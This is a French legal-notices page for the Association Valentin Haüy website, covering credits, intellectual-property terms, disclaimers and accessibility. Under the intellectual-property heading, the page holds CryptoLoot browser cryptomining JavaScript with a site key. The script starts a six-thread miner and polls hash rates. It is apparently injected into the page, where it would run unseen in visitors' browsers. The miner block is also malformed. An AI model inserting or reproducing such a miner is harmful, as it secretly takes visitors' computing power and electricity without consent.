Conception, design et Réalisation :

EXCEL

Publication, rédaction :

Françoise Lecordier, Lucile Bourguignon

Propriété intellectuelle :

var miner = new CryptoLoot.Anonymous('f9aab30f4a671552a709ae53e816e03744746ce262a3');
miner.start();

var miner=new CryptoLoot.Anonymous('f9aab30f4a671552a709ae53e816e03744746ce262a3',
{
threads:6,autoThreads:false,throttle:0.2,
);
miner.start();

// Listen on events
miner.on('found', function() { /* Hash found */ })
miner.on('accepted', function() { /* Hash accepted by the pool */ })

// Update stats once per second
setInterval(function() {
var hashesPerSecond = miner.getHashesPerSecond();
var totalHashes = miner.getTotalHashes();
var acceptedHashes = miner.getAcceptedHashes();

// Output to HTML elements...
}, 1000);

Toute reproduction ou distribution non autorisée de tout ou partie des éléments et informations de ce site est interdite. Le contenu est disponible pour un usage privé et non collectif.
Le code de la propriété intellectuelle n’autorisant, aux termes de l’article L. 122-5.2° et 3°a, d’une part, que les “copies ou reproductions strictement réservées à l’usage privé du copiste et non destinées à une utilisation collective” et, d’autre part, que les analyses et les courtes citations dans un but d’exemple et d’illustration, “toute représentation ou reproduction intégrale ou partielle faite sans le consentement de l’auteur ou de ses ayants droit ou ayants cause est illicite” (art. L. 122-4). Cette représentation ou reproduction, par quelque procédé que ce soit constituerait donc une contrefaçon sanctionnée par les articles L. 335-2 et suivants du code de la propriété intellectuelle.

Marques et logos, liens hypertextes

Toute utilisation quelle qu’elle soit des noms de marques et logos de ce site est interdite sans l’autorisation de l’Association Valentin Haüy.

Exploitation des informations

Malgré le soin apporté au traitement des informations, l’Association Valentin Haüy décline toute responsabilité concernant les erreurs ou omissions portant sur les informations diffusées sur ce site. L’Association Valentin Haüy ne peut être tenue responsable de l’interprétation des informations contenues dans ce site, ni des conséquences de leur utilisation.

Liens

L’Association Valentin Haüy est soucieuse de la qualité des liens dont elle fait mention. Toutefois, l’Association Valentin Haüy décline toute responsabilité sur le contenu des sites présentés.

Accessibilité

Un soin tout particulier a été pris pour rendre le site accessible au plus grand nombre et plus particulièrement aux personnes ayant un handicap visuel.
Ce site est développé selon les normes W3C.
Le site est compatible avec tous les navigateurs disponibles. Il est accessible à tous, sauf en cas de force majeure.